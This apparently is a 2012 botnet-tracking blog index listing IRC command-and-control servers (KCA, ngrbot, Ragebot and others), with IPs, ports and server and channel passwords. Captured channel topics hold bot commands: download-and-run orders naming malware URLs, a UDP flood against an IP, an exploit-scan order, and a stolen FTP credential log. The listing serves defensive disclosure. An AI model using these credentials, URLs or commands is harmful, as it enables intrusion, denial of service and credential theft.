m74.zapto.org resolved to 78.47.200.71Server: m74.zapto.orgPort: 6667Channel: #guerraBotnick: jorg3-HmlwqTUaTopic: * Topic for #guerra is: .jorge 200 200 189* Topic for #guerra set by Jorgee at Sat Sep 01 00:48:08 2012 #guerra 61 [+smtu] .jorge 200 200 189 Other channel #c0ntr0l (autojoined on connect)#c0ntr0l 242 [+smtu] #s Oper hangout * [Jorgee] (vxbzisp@jorge.c): vxbzisp * [Jorgee] @#guerra @#s #c0ntr0lRead more...
kca.hopto.org (ngrbot and iRooT bot hosted by Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)
KCA botnet found by xDrulz (all logs come from him)kca.hopto.org resolved to 88.255.116.48Server: kca.hopto.orgPort:1453Channel: #KCAPassword: KCABotnick: {US|XP-32a}dwqeivt Channel: #XXXPassword: KCABotnick: [iRooT-XP-USA]959715 Other channels #s #XX #Okey * Retrieving #Okey modes…[14:21:06] * irc.ciftokey.com sets mode: +o Cihan[14:22:31] <Cihan> .udp 91.229.35.79 5050 5[14:49:34] <Cihan> .visit http://www.avdeposu.com.tr Stealing ftp passwords [19:32] <IRC> {US|XP-32a}dwqeivt: FileZilla -> 7 ser5.scottdalehosting5.com –Read more...
imtheking.pig1.cc (ngrbot hosted by Lithuania Ovh Systems)
Resolved imtheking.pig1.cc to 5.135.19.212 Server: imtheking.pig1.cc Port: 8778 Server password: secret Channel:#JEFE Channel password: nogays Channel topic: Topic for #JEFE is: ~up http://elvenking.net/fan/tabs/jsdu.exe 42224acfcb33d8bdbc9101957e3dc0bc ~s Topic for #JEFE set by depredetor at Wed Aug 29 15:50:33 2012 Other channels are country codes: #US, #GB, #SE, etc Hosting infos: http://whois.domaintools.com/5.135.19.212 Sample Download
LilyJade again
Lilyjade is back and has moved up in the world. After Google chrome prevented the installation of extensions from sources other than the official webstore (due to the actions of malicious extensions such as lilyjade), lilyjade had a problem. Rather than explain the complicated steps needed to bypass the restriction, lilyjade spreaders have bypassed theRead more...
kca.zapto.org (irc bot hosted in United States State College Comcast Business Communications Llc)
Mirc xdcc bots Resolved : [kca.zapto.org] To [173.167.76.199] [ADMINCHAN] channel=#KCA3 admin-enable=$true [nick] prenick=WarezDivx [passwords] owner=d9b820a195766546549a0e9a7fb8728d admin=d9b820a195766546549a0e9a7fb8728d filler=d9b820a195766546549a0e9a7fb8728d [message] header-enable=$true footer-enable=$true header=..::[ 1WaReZ R00tZ 2009 ]::.. footer=..::[ 1WaReZ R00tZ 2009 ]::.. [options] needvoice=off [xserver] nspass= status=on sent=2310 packs=0 [xdcc] reqmeth=msg enable-queues=$true enable-autoadd=$false sends=10 queues=20 sends-user=1 queues-user=2 message=$true time=30 [show] queues=$true slots=$true record=$true bandwidth=$true total=$true [channels] 1=#KCA3Read more...
bb.qc.to (IRC botnets hosted by France Roubaix Ovh Systems)
Resolved bb.qc.to to 37.59.35.104 Server: bb.qc.to Port: 7356 Password: d0wn * There are 1 users and 896 invisible on 1 servers * 4 :unknown connection(s) * 41 :channels formed * I have 897 clients and 0 servers * Current Local Users: 897 Max: 1356 * Current Global Users: 897 Max: 1356 Channel: #d0wn4l1f3 Pass: downRead more...
Havoc.strangled.net(irc bot hosted in United States State College Comcast Business Communications Llc)
Resolved : [Havoc.strangled.net] To [173.167.76.199] Server: 173.167.76.199:6667 PASS KCA channel: #s sample here: !dl http://67.18.242.165/~corporac/med.exe hosting infos: http://whois.domaintools.com/173.167.76.199
usagov.servequake.com (Ragebot and ngrbot hosted by United States State College Comcast Business Communications Llc)
Connecting to usagov.servequake.com (173.167.76.199) Server: usagov.servequake.com Port: 6667 Channel: ##fbi## Topic for ##fbi## is: .xpl 90 1 189.x.x.x 3 1 201.x.x.x 3 1 Topic for ##fbi## set by Jorgee at Wed Aug 22 16:56:44 2012 Opers:st0n3d, DarkMisterio, Jorgee, KCA, Morad, Supreme, unutulan Auth host: Jorgee (Jorgee@jorge.c) Nick format: raGe|mtpxriDbDh Channel: #s Topic for #s is:Read more...
4.byinter.net(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)
Resolved : [4.byinter.net] To [88.255.116.47] Download URLs http://72.32.8.40/iplocator.htm (www.geobytes.com) http://108.167.179.252/xxx.exe (www.grupobysoft.com) Outgoing connection to remote server: www.geobytes.com TCP port 80 C&C Server: 88.255.116.47:6667 Server Password: Username: TURKiSH Nickname: [N][DEU][XP][29218] Channel: #s (Password: KCA) #X, #XX, #XXX and #KCA Channeltopic: :!download http://www.grupobysoft.com/xxx.exe 1 hosting infos: http://whois.domaintools.com/88.255.116.47
uokm8.biz(Insomnia Bot hosted in Netherlands Tilburg nfinite Technologies Limited)
Found from Userbased Resolved : [uokm8.biz] To [192.162.136.148] server port channel Clients: I have 78 clients and 0 servers Local users: Current Local Users: 78 Max: 156 Global users: Current Global Users: 78 Max: 156 uokm8.biz:3281 #zyk# hosting infos: http://whois.domaintools.com/192.162.136.148